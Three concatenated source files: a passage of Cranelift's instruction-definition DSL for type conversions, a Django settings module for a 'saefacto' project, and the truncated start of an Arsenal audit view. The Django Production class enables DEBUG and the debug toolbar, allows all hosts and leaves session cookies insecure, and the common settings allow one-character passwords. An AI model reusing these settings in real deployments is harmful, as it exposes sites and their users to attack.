input and output types are the same, this is a no-op.
""", ins=x, outs=a, constraints=WiderOrEq(BoolTo, Bool))
IntTo = TypeVar(
'IntTo', 'An integer type with the same number of lanes',
ints=True, simd=True)
x = Operand('x', Bool)
a = Operand('a', IntTo)
bint = Instruction(
'bint', r"""
Convert `x` to an integer.
True maps to 1 and false maps to 0. The result type must have the same
number of vector lanes as the input.
""", ins=x, outs=a)
bmask = Instruction(
'bmask', r"""
Convert `x` to an integer mask.
True maps to all 1s and false maps to all 0s. The result type must have
the same number of vector lanes as the input.
""", ins=x, outs=a)
Int = TypeVar('Int', 'A scalar or vector integer type', ints=True, simd=True)
IntTo = TypeVar(
'IntTo', 'A smaller integer type with the same number of lanes',
ints=True, simd=True)
x = Operand('x', Int)
a = Operand('a', IntTo)
ireduce = Instruction(
'ireduce', r"""
Convert `x` to a smaller integer type by dropping high bits.
Each lane in `x` is converted to a smaller integer type by discarding
the most significant bits. This is the same as reducing modulo
:math:`2^n`.
The result type must have the same number of vector lanes as the input,
and each lane must not have more bits than the input lanes. If the
input and output types are the same, this is a no-op.
""",
ins=x, outs=a, constraints=WiderOrEq(Int, IntTo))
IntTo = TypeVar(
'IntTo', 'A larger integer type with the same number of lanes',
ints=True, simd=True)
x = Operand('x', Int)
a = Operand('a', IntTo)
uextend = Instruction(
'uextend', r"""
Convert `x` to a larger integer type by zero-extending.
Each lane in `x` is converted to a larger integer type by adding
zeroes. The result has the same numerical value as `x` when both are
interpreted as unsigned integers.
The result type must have the same number of vector lanes as the input,
and each lane must not have fewer bits than the input lanes. If the
input and output types are the same, this is a no-op.
""",
ins=x, outs=a, constraints=WiderOrEq(IntTo, Int))
sextend = Instruction(
'sextend', r"""
Convert `x` to a larger integer type by sign-extending.
Each lane in `x` is converted to a larger integer type by replicating
the sign bit. The result has the same numerical value as `x` when both
are interpreted as signed integers.
The result type must have the same number of vector lanes as the input,
and each lane must not have fewer bits than the input lanes. If the
input and output types are the same, this is a no-op.
""",
ins=x, outs=a, constraints=WiderOrEq(IntTo, Int))
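# Illustrative sketch (not part of the DSL): scalar reference semantics for
# ireduce/uextend/sextend, assuming `x` is a non-negative bit pattern and
# `frm`/`to` are lane widths in bits.
def _ref_ireduce(x, to):
    """Keep the low `to` bits, i.e. reduce modulo 2**to."""
    return x & ((1 << to) - 1)


def _ref_uextend(x, frm, to):
    """Zero-extension leaves the unsigned value unchanged."""
    assert 0 <= x < (1 << frm) and to >= frm
    return x


def _ref_sextend(x, frm, to):
    """Replicate the sign bit of the `frm`-bit pattern into the high bits."""
    mask = ((1 << (to - frm)) - 1) << frm
    return x | mask if x & (1 << (frm - 1)) else x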
FloatTo = TypeVar(
'FloatTo', 'A scalar or vector floating point number',
floats=True, simd=True)
x = Operand('x', Float)
a = Operand('a', FloatTo)
fpromote = Instruction(
'fpromote', r"""
Convert `x` to a larger floating point format.
Each lane in `x` is converted to the destination floating point format.
This is an exact operation.
Cranelift currently only supports two floating point formats
- :type:`f32` and :type:`f64`. This may change in the future.
The result type must have the same number of vector lanes as the input,
and the result lanes must not have fewer bits than the input lanes. If
the input and output types are the same, this is a no-op.
""",
ins=x, outs=a, constraints=WiderOrEq(FloatTo, Float))
fdemote = Instruction(
'fdemote', r"""
Convert `x` to a smaller floating point format.
Each lane in `x` is converted to the destination floating point format
by rounding to nearest, ties to even.
Cranelift currently only supports two floating point formats
- :type:`f32` and :type:`f64`. This may change in the future.
The result type must have the same number of vector lanes as the input,
and the result lanes must not have more bits than the input lanes. If
the input and output types are the same, this is a no-op.
""",
ins=x, outs=a, constraints=WiderOrEq(Float, FloatTo))
x = Operand('x', Float)
a = Operand('a', IntTo)
fcvt_to_uint = Instruction(
'fcvt_to_uint', r"""
Convert floating point to unsigned integer.
Each lane in `x` is converted to an unsigned integer by rounding
towards zero. If `x` is NaN or if the unsigned integral value cannot be
represented in the result type, this instruction traps.
The result type must have the same number of vector lanes as the input.
""",
ins=x, outs=a, can_trap=True)
fcvt_to_uint_sat = Instruction(
'fcvt_to_uint_sat', r"""
Convert floating point to unsigned integer as fcvt_to_uint does, but
saturates the input instead of trapping. NaN and negative values are
converted to 0.
""",
ins=x, outs=a)
fcvt_to_sint = Instruction(
'fcvt_to_sint', r"""
Convert floating point to signed integer.
Each lane in `x` is converted to a signed integer by rounding towards
zero. If `x` is NaN or if the signed integral value cannot be
represented in the result type, this instruction traps.
The result type must have the same number of vector lanes as the input.
""",
ins=x, outs=a, can_trap=True)
fcvt_to_sint_sat = Instruction(
'fcvt_to_sint_sat', r"""
Convert floating point to signed integer as fcvt_to_sint does, but
saturates the input instead of trapping. NaN values are converted to 0.
""",
ins=x, outs=a)
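# Illustrative sketch (not part of the DSL): scalar saturating float-to-
# signed-integer conversion, assuming truncation towards zero and a
# `bits`-wide two's-complement result. NaN maps to 0, as documented above.
import math


def _ref_fcvt_to_sint_sat(x, bits):
    if math.isnan(x):
        return 0
    lo, hi = -(1 << (bits - 1)), (1 << (bits - 1)) - 1
    if math.isinf(x):
        return hi if x > 0 else lo
    return max(lo, min(hi, int(x)))  # int() truncates towards zero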
x = Operand('x', Int)
a = Operand('a', FloatTo)
fcvt_from_uint = Instruction(
'fcvt_from_uint', r"""
Convert unsigned integer to floating point.
Each lane in `x` is interpreted as an unsigned integer and converted to
floating point using round to nearest, ties to even.
The result type must have the same number of vector lanes as the input.
""",
ins=x, outs=a)
fcvt_from_sint = Instruction(
'fcvt_from_sint', r"""
Convert signed integer to floating point.
Each lane in `x` is interpreted as a signed integer and converted to
floating point using round to nearest, ties to even.
The result type must have the same number of vector lanes as the input.
""",
ins=x, outs=a)
#
# Legalization helper instructions.
#
WideInt = TypeVar(
'WideInt', 'An integer type with lanes from `i16` upwards',
ints=(16, 64), simd=True)
x = Operand('x', WideInt)
lo = Operand(
'lo', WideInt.half_width(), 'The low bits of `x`')
hi = Operand(
'hi', WideInt.half_width(), 'The high bits of `x`')
isplit = Instruction(
'isplit', r"""
Split an integer into low and high parts.
Vectors of integers are split lane-wise, so the results have the same
number of lanes as the input, but the lanes are half the size.
Returns the low half of `x` and the high half of `x` as two independent
values.
""",
ins=x, outs=(lo, hi), is_ghost=True)
NarrowInt = TypeVar(
'NarrowInt', 'An integer type with lanes from `i8` to `i32`',
ints=(8, 32), simd=True)
lo = Operand('lo', NarrowInt)
hi = Operand('hi', NarrowInt)
a = Operand(
'a', NarrowInt.double_width(),
doc='The concatenation of `lo` and `hi`')
iconcat = Instruction(
'iconcat', r"""
Concatenate low and high bits to form a larger integer type.
Vectors of integers are concatenated lane-wise such that the result has
the same number of lanes as the inputs, but the lanes are twice the
size.
""",
ins=(lo, hi), outs=a, is_ghost=True)
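# Illustrative sketch (not part of the DSL): isplit and iconcat are inverses
# on scalar bit patterns. Assuming `bits` is the wide lane width:
def _ref_isplit(x, bits):
    half = bits // 2
    return x & ((1 << half) - 1), x >> half  # (lo, hi)


def _ref_iconcat(lo, hi, half):
    return (hi << half) | lo


assert _ref_iconcat(*_ref_isplit(0xDEADBEEF, 32), half=16) == 0xDEADBEEF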
GROUP.close()
|
# -*- coding: utf-8 -*-
"""
Django settings for saefacto project.
For more information on this file, see
https://docs.djangoproject.com/en/dev/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/dev/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
from os.path import join
# See: http://django-storages.readthedocs.org/en/latest/backends/amazon-S3.html#settings
try:
from S3 import CallingFormat
AWS_CALLING_FORMAT = CallingFormat.SUBDOMAIN
except ImportError:
# TODO: Fix this so the S3 import is not attempted in dev, where it is unused.
pass
from configurations import Configuration, values
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
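# Usage sketch (an assumption based on standard django-configurations
# conventions, not project-specific code): the concrete settings class below
# is selected at startup via the DJANGO_CONFIGURATION environment variable,
# e.g.
#
#   DJANGO_CONFIGURATION=Local DJANGO_SETTINGS_MODULE=config.settings \
#       python manage.py runserver
#
# values.Value attributes read DJANGO_-prefixed environment variables, and
# values.SecretValue raises an error at startup if its variable is unset.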
class Common(Configuration):
########## APP CONFIGURATION
DJANGO_APPS = (
# Default Django apps:
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
# Useful template tags:
# 'django.contrib.humanize',
# 'suit',
# Admin
'django.contrib.admin',
'django.contrib.admindocs',
)
THIRD_PARTY_APPS = (
'south', # Database migration helpers:
'crispy_forms', # Form layouts
'avatar', # for user avatars
'sitetree',
'sitetree_smartadmin',
'django_user_agents',
'statici18n', # javascript
'parsley',
)
# Apps specific for this project go here.
LOCAL_APPS = (
'users', # custom users app
'core',
'main',
)
# See: https://docs.djangoproject.com/en/dev/ref/settings/#installed-apps
INSTALLED_APPS = DJANGO_APPS + THIRD_PARTY_APPS + LOCAL_APPS
INSTALLED_APPS += (
# Needs to come last for now because of a weird edge case between
# South and allauth
'allauth', # registration
'allauth.account', # registration
'allauth.socialaccount', # registration
)
########## END APP CONFIGURATION
########## MIDDLEWARE CONFIGURATION
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django_user_agents.middleware.UserAgentMiddleware',
)
########## END MIDDLEWARE CONFIGURATION
########## DEBUG
# See: https://docs.djangoproject.com/en/dev/ref/settings/#debug
DEBUG = values.BooleanValue(False)
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-debug
TEMPLATE_DEBUG = DEBUG
########## END DEBUG
########## SECRET CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#secret-key
# Note: This key is only used for development and testing.
# In production, this is changed to a values.SecretValue() setting
SECRET_KEY = "CHANGEME!!!"
########## END SECRET CONFIGURATION
########## FIXTURE CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#std:setting-FIXTURE_DIRS
FIXTURE_DIRS = (
join(BASE_DIR, 'fixtures'),
)
########## END FIXTURE CONFIGURATION
########## EMAIL CONFIGURATION
EMAIL_BACKEND = values.Value('django.core.mail.backends.smtp.EmailBackend')
########## END EMAIL CONFIGURATION
########## MANAGER CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#admins
ADMINS = (
('Fábio C. Barrionuevo da Luz', '[email protected]'),
)
# See: https://docs.djangoproject.com/en/dev/ref/settings/#managers
MANAGERS = ADMINS
########## END MANAGER CONFIGURATION
########## DATABASE CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#databases
DATABASES = values.DatabaseURLValue('postgres://localhost/saefacto')
########## END DATABASE CONFIGURATION
########## CACHING
# Do this here because, thanks to django-pylibmc-sasl and pylibmc, memcacheify is painful to install on Windows.
# memcacheify is what's used in Production
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': ''
}
}
########## END CACHING
########## GENERAL CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#time-zone
TIME_ZONE = 'America/Araguaina'
# See: https://docs.djangoproject.com/en/dev/ref/settings/#language-code
LANGUAGE_CODE = 'pt-br'
LANGUAGES = (
('pt-br', u'Português do Brasil'),
('en', 'English'),
('es', u'Español'),
)
# See: https://docs.djangoproject.com/en/dev/ref/settings/#site-id
SITE_ID = 1
# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-i18n
USE_I18N = True
# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-l10n
USE_L10N = True
# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-tz
USE_TZ = True
########## END GENERAL CONFIGURATION
########## TEMPLATE CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-context-processors
TEMPLATE_CONTEXT_PROCESSORS = (
'django.contrib.auth.context_processors.auth',
"allauth.account.context_processors.account",
"allauth.socialaccount.context_processors.socialaccount",
'django.core.context_processors.debug',
'django.core.context_processors.i18n',
'django.core.context_processors.media',
'django.core.context_processors.static',
'django.core.context_processors.tz',
'django.contrib.messages.context_processors.messages',
'django.core.context_processors.request',
# Your stuff: custom template context processors go here
)
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-dirs
TEMPLATE_DIRS = (
join(BASE_DIR, 'templates'),
)
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
)
# See: http://django-crispy-forms.readthedocs.org/en/latest/install.html#template-packs
CRISPY_TEMPLATE_PACK = 'bootstrap3'
########## END TEMPLATE CONFIGURATION
########## STATIC FILE CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#static-root
STATIC_ROOT = join(os.path.dirname(BASE_DIR), 'staticfiles')
# See: https://docs.djangoproject.com/en/dev/ref/settings/#static-url
STATIC_URL = '/static/'
# See: https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#std:setting-STATICFILES_DIRS
STATICFILES_DIRS = (
join(BASE_DIR, 'static'),
)
# See: https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#staticfiles-finders
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
)
########## END STATIC FILE CONFIGURATION
########## MEDIA CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#media-root
MEDIA_ROOT = join(BASE_DIR, 'media')
# See: https://docs.djangoproject.com/en/dev/ref/settings/#media-url
MEDIA_URL = '/media/'
########## END MEDIA CONFIGURATION
########## URL Configuration
ROOT_URLCONF = 'config.urls'
# See: https://docs.djangoproject.com/en/dev/ref/settings/#wsgi-application
WSGI_APPLICATION = 'config.wsgi.application'
########## End URL Configuration
########## AUTHENTICATION CONFIGURATION
AUTHENTICATION_BACKENDS = (
"django.contrib.auth.backends.ModelBackend",
"allauth.account.auth_backends.AuthenticationBackend",
)
# Some really nice defaults
ACCOUNT_AUTHENTICATION_METHOD = "username"
ACCOUNT_EMAIL_REQUIRED = True
ACCOUNT_EMAIL_VERIFICATION = "mandatory"
ACCOUNT_PASSWORD_MIN_LENGTH = 1
########## END AUTHENTICATION CONFIGURATION
########## Custom user app defaults
# Select the correct user model
AUTH_USER_MODEL = "users.User"
LOGIN_REDIRECT_URL = "users:redirect"
########## END Custom user app defaults
########## SLUGLIFIER
AUTOSLUG_SLUGIFY_FUNCTION = "slugify.slugify"
########## END SLUGLIFIER
########## LOGGING CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#logging
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error when DEBUG=False.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
}
},
'handlers': {
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
########## END LOGGING CONFIGURATION
########## Your common stuff: Below this line define 3rd party library settings
class Local(Common):
########## DEBUG
DEBUG = values.BooleanValue(True)
TEMPLATE_DEBUG = DEBUG
########## END DEBUG
########## INSTALLED_APPS
INSTALLED_APPS = Common.INSTALLED_APPS
########## END INSTALLED_APPS
########## Mail settings
EMAIL_HOST = "localhost"
EMAIL_PORT = 1025
EMAIL_BACKEND = values.Value('django.core.mail.backends.console.EmailBackend')
########## End mail settings
########## DATABASE CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#databases
#DATABASES = values.DatabaseURLValue('postgres://localhost/projetosgt')
DATABASES = values.DatabaseURLValue('sqlite:////{0}.sqlite'.format(join(BASE_DIR, 'sae_db')))
########## END DATABASE CONFIGURATION
########## django-debug-toolbar
MIDDLEWARE_CLASSES = Common.MIDDLEWARE_CLASSES + ('debug_toolbar.middleware.DebugToolbarMiddleware',)
INSTALLED_APPS += ('debug_toolbar',)
INTERNAL_IPS = ('127.0.0.1',)
DEBUG_TOOLBAR_CONFIG = {
'INTERCEPT_REDIRECTS': False,
'SHOW_TEMPLATE_CONTEXT': True,
}
########## end django-debug-toolbar
########## Your local stuff: Below this line define 3rd party library settings
#SITETREE_MODEL_TREE = 'sitetree_smartadmin.SmartTree'
SITETREE_MODEL_TREE_ITEM = 'sitetree_smartadmin.SmartTreeItem'
class Production(Common):
########## INSTALLED_APPS
INSTALLED_APPS = Common.INSTALLED_APPS
INSTALLED_APPS += ('allauth.socialaccount.providers.facebook',
'allauth.socialaccount.providers.github', )
########## END INSTALLED_APPS
########## SECRET KEY
SECRET_KEY = values.SecretValue()
########## END SECRET KEY
########## django-secure
INSTALLED_APPS += ("djangosecure", )
# set this to 60 seconds and then to 518400 when you can prove it works
SECURE_HSTS_SECONDS = 60
SECURE_HSTS_INCLUDE_SUBDOMAINS = values.BooleanValue(True)
SECURE_FRAME_DENY = values.BooleanValue(True)
SECURE_CONTENT_TYPE_NOSNIFF = values.BooleanValue(True)
SECURE_BROWSER_XSS_FILTER = values.BooleanValue(True)
SESSION_COOKIE_SECURE = values.BooleanValue(False)
SESSION_COOKIE_HTTPONLY = values.BooleanValue(True)
SECURE_SSL_REDIRECT = values.BooleanValue(True)
########## end django-secure
########## SITE CONFIGURATION
# Hosts/domain names that are valid for this site
# See https://docs.djangoproject.com/en/1.6/ref/settings/#allowed-hosts
ALLOWED_HOSTS = ["*"]
########## END SITE CONFIGURATION
INSTALLED_APPS += ("gunicorn", )
########## STORAGE CONFIGURATION
# See: http://django-storages.readthedocs.org/en/latest/index.html
INSTALLED_APPS += (
'storages',
)
# See: http://django-storages.readthedocs.org/en/latest/backends/amazon-S3.html#settings
STATICFILES_STORAGE = DEFAULT_FILE_STORAGE = 'storages.backends.s3boto.S3BotoStorage'
# See: http://django-storages.readthedocs.org/en/latest/backends/amazon-S3.html#settings
AWS_ACCESS_KEY_ID = values.SecretValue()
AWS_SECRET_ACCESS_KEY = values.SecretValue()
AWS_STORAGE_BUCKET_NAME = values.SecretValue()
AWS_AUTO_CREATE_BUCKET = True
AWS_QUERYSTRING_AUTH = False
# see: https://github.com/antonagestam/collectfast
AWS_PRELOAD_METADATA = True
INSTALLED_APPS += ("collectfast", )
# AWS cache settings, don't change unless you know what you're doing:
AWS_EXPIRY = 60 * 60 * 24 * 7
AWS_HEADERS = {
'Cache-Control': 'max-age=%d, s-maxage=%d, must-revalidate' % (AWS_EXPIRY,
AWS_EXPIRY)
}
# See: https://docs.djangoproject.com/en/dev/ref/settings/#static-url
STATIC_URL = 'https://s3.amazonaws.com/%s/' % AWS_STORAGE_BUCKET_NAME
########## END STORAGE CONFIGURATION
########## EMAIL
DEFAULT_FROM_EMAIL = values.Value(
'saefacto <[email protected]>')
EMAIL_HOST = values.Value('smtp.sendgrid.com')
EMAIL_HOST_PASSWORD = values.SecretValue(environ_prefix="", environ_name="SENDGRID_PASSWORD")
EMAIL_HOST_USER = values.SecretValue(environ_prefix="", environ_name="SENDGRID_USERNAME")
EMAIL_PORT = values.IntegerValue(587, environ_prefix="", environ_name="EMAIL_PORT")
EMAIL_SUBJECT_PREFIX = values.Value('[saefacto] ', environ_name="EMAIL_SUBJECT_PREFIX")
EMAIL_USE_TLS = True
SERVER_EMAIL = EMAIL_HOST_USER
########## END EMAIL
########## TEMPLATE CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-dirs
TEMPLATE_LOADERS = (
('django.template.loaders.cached.Loader', (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
)),
)
########## END TEMPLATE CONFIGURATION
########## CACHING
# Only do this here because, thanks to django-pylibmc-sasl and pylibmc, memcacheify is painful to install on Windows.
try:
# See: https://github.com/rdegges/django-heroku-memcacheify
from memcacheify import memcacheify
CACHES = memcacheify()
except ImportError:
CACHES = values.CacheURLValue(default="memcached://127.0.0.1:11211")
########## END CACHING
########## Your production stuff: Below this line define 3rd party library settings
########## DEBUG
DEBUG = values.BooleanValue(True)
TEMPLATE_DEBUG = DEBUG
########## END DEBUG
########## django-debug-toolbar
MIDDLEWARE_CLASSES = Common.MIDDLEWARE_CLASSES + ('debug_toolbar.middleware.DebugToolbarMiddleware',)
INSTALLED_APPS += ('debug_toolbar',)
INTERNAL_IPS = ('127.0.0.1',)
DEBUG_TOOLBAR_CONFIG = {
'DISABLE_PANELS': ['debug_toolbar.panels.redirects.RedirectsPanel'],
'SHOW_TEMPLATE_CONTEXT': True,
}
########## end django-debug-toolbar
#######################################################################################
# terribly ugly hack to make PyCharm recognize the libraries
# the code below is never executed
if 1 == 2:
INSTALLED_APPS = (
# Default Django apps:
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
# Useful template tags:
# 'django.contrib.humanize',
# Admin
'django.contrib.admin',
'south', # Database migration helpers:
'crispy_forms', # Form layouts
'avatar', # for user avatars
'sitetree',
'sitetree_smartadmin',
'django_user_agents',
'statici18n', # javascript
'users', # custom users app
'core',
'main',
# Needs to come last for now because of a weird edge case between
# South and allauth
'allauth', # registration
'allauth.account', # registration
'allauth.socialaccount', # registration
)
########## END APP CONFIGURATION
########## MIDDLEWARE CONFIGURATION
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
########## END MIDDLEWARE CONFIGURATION
########## DEBUG
# See: https://docs.djangoproject.com/en/dev/ref/settings/#debug
DEBUG = True
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-debug
TEMPLATE_DEBUG = DEBUG
########## END DEBUG
########## SECRET CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#secret-key
# Note: This key is only used for development and testing.
# In production, this is changed to a values.SecretValue() setting
SECRET_KEY = "CHANGEME!!!"
########## END SECRET CONFIGURATION
########## FIXTURE CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#std:setting-FIXTURE_DIRS
FIXTURE_DIRS = (
join(BASE_DIR, 'fixtures'),
)
########## END FIXTURE CONFIGURATION
########## EMAIL CONFIGURATION
EMAIL_BACKEND = values.Value('django.core.mail.backends.smtp.EmailBackend')
########## END EMAIL CONFIGURATION
########## MANAGER CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#admins
ADMINS = (
('Fábio C. Barrionuevo da Luz', '[email protected]'),
)
# See: https://docs.djangoproject.com/en/dev/ref/settings/#managers
MANAGERS = ADMINS
########## END MANAGER CONFIGURATION
########## DATABASE CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#databases
########## END DATABASE CONFIGURATION
########## CACHING
# Do this here because, thanks to django-pylibmc-sasl and pylibmc, memcacheify is painful to install on Windows.
# memcacheify is what's used in Production
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': ''
}
}
########## END CACHING
########## GENERAL CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#time-zone
TIME_ZONE = 'America/Los_Angeles'
# See: https://docs.djangoproject.com/en/dev/ref/settings/#language-code
LANGUAGE_CODE = 'en-us'
# See: https://docs.djangoproject.com/en/dev/ref/settings/#site-id
SITE_ID = 1
# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-i18n
USE_I18N = True
# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-l10n
USE_L10N = True
# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-tz
USE_TZ = True
########## END GENERAL CONFIGURATION
########## TEMPLATE CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-context-processors
TEMPLATE_CONTEXT_PROCESSORS = (
'django.contrib.auth.context_processors.auth',
"allauth.account.context_processors.account",
"allauth.socialaccount.context_processors.socialaccount",
'django.core.context_processors.debug',
'django.core.context_processors.i18n',
'django.core.context_processors.media',
'django.core.context_processors.static',
'django.core.context_processors.tz',
'django.contrib.messages.context_processors.messages',
'django.core.context_processors.request',
# Your stuff: custom template context processors go here
)
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-dirs
TEMPLATE_DIRS = (
join(BASE_DIR, 'templates'),
)
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
)
# See: http://django-crispy-forms.readthedocs.org/en/latest/install.html#template-packs
CRISPY_TEMPLATE_PACK = 'bootstrap3'
########## END TEMPLATE CONFIGURATION
########## STATIC FILE CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#static-root
STATIC_ROOT = join(os.path.dirname(BASE_DIR), 'staticfiles')
# See: https://docs.djangoproject.com/en/dev/ref/settings/#static-url
STATIC_URL = '/static/'
# See: https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#std:setting-STATICFILES_DIRS
STATICFILES_DIRS = (
join(BASE_DIR, 'static'),
)
# See: https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#staticfiles-finders
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
)
########## END STATIC FILE CONFIGURATION
########## MEDIA CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#media-root
MEDIA_ROOT = join(BASE_DIR, 'media')
# See: https://docs.djangoproject.com/en/dev/ref/settings/#media-url
MEDIA_URL = '/media/'
########## END MEDIA CONFIGURATION
########## URL Configuration
ROOT_URLCONF = 'config.urls'
# See: https://docs.djangoproject.com/en/dev/ref/settings/#wsgi-application
WSGI_APPLICATION = 'config.wsgi.application'
########## End URL Configuration
########## AUTHENTICATION CONFIGURATION
AUTHENTICATION_BACKENDS = (
"django.contrib.auth.backends.ModelBackend",
"allauth.account.auth_backends.AuthenticationBackend",
)
# Some really nice defaults
ACCOUNT_AUTHENTICATION_METHOD = "username"
ACCOUNT_EMAIL_REQUIRED = True
ACCOUNT_EMAIL_VERIFICATION = "mandatory"
########## END AUTHENTICATION CONFIGURATION
########## Custom user app defaults
# Select the correct user model
AUTH_USER_MODEL = "users.User"
LOGIN_REDIRECT_URL = "users:redirect"
########## END Custom user app defaults
########## SLUGLIFIER
AUTOSLUG_SLUGIFY_FUNCTION = "slugify.slugify"
########## END SLUGLIFIER
########## LOGGING CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#logging
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error when DEBUG=False.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
}
},
'handlers': {
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
########## END LOGGING CONFIGURATION
########## Your common stuff: Below this line define 3rd party library settings
|
'''Arsenal audit UI.'''
# Copyright 2015 CityGrid Media, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import logging
from pyramid.view import view_config
from arsenalweb.views import (
_api_get,
get_authenticated_user,
get_nav_urls,
get_pag_params,
site_layout,
)
LOG = logging.getLogger(__name__)
@view_config(route_name='data_centers_audit', permission='view', renderer='arsenalweb:templates/all_audit.pt')
@view_config(route_name='hardware_profiles_audit', permission='view', renderer='arsenalweb:templates/all_audit.pt')
@view_config(route_name='ip_addresses_audit', permission='view', renderer='arsenalweb:templates/all_audit.pt')
@view_config(route_name='network_interfaces_audit', permission='view', renderer='arsenalweb:templates/all_audit.pt')
@view_config(route_name='node_groups_audit', permission='view', renderer='arsenalweb:templates/all_audit.pt')
@view_config(route_name='nodes_audit', permission='view', renderer='arsenalweb:templates/all_audit.pt')
@view_config(route_name='operating_systems_audit', permission='view', renderer='arsenalweb:templates/all_audit.pt')
@view_config(route_name='statuses_audit', permission='view', renderer='arsenalweb:templates/all_audit.pt')
@view_config(route_name='tags_audit', permission='view', renderer='arsenalweb:templates/all_audit.pt')
def view_all_audit(request):
'''Handle requests for the overall object type audit UI route.'''
page_title_type = 'objects/'
auth_user = get_authenticated_user(request)
(perpage, offset) = get_pag_params(request)
meta = {
'data_centers_audit': {
'page_type': 'Data Centers',
'object_type': 'data_centers',
},
'hardware_profiles_audit': {
'page_type': 'Hardware Profiles',
'object_type': 'hardware_profiles',
},
'ip_addresses_audit': {
'page_type': 'IpAddress',
'object_type': 'ip_addresses',
},
'network_interfaces_audit': {
'page_type': 'NetworkInterface',
'object_type': 'network_interfaces',
},
'nodes_audit': {
'page_type': 'Node',
'object_type': 'nodes',
},
'node_groups_audit': {
'page_type': 'Node Group',
'object_type': 'node_groups',
},
'operating_systems_audit': {
'page_type': 'Operating Systems',
'object_type': 'operating_systems',
},
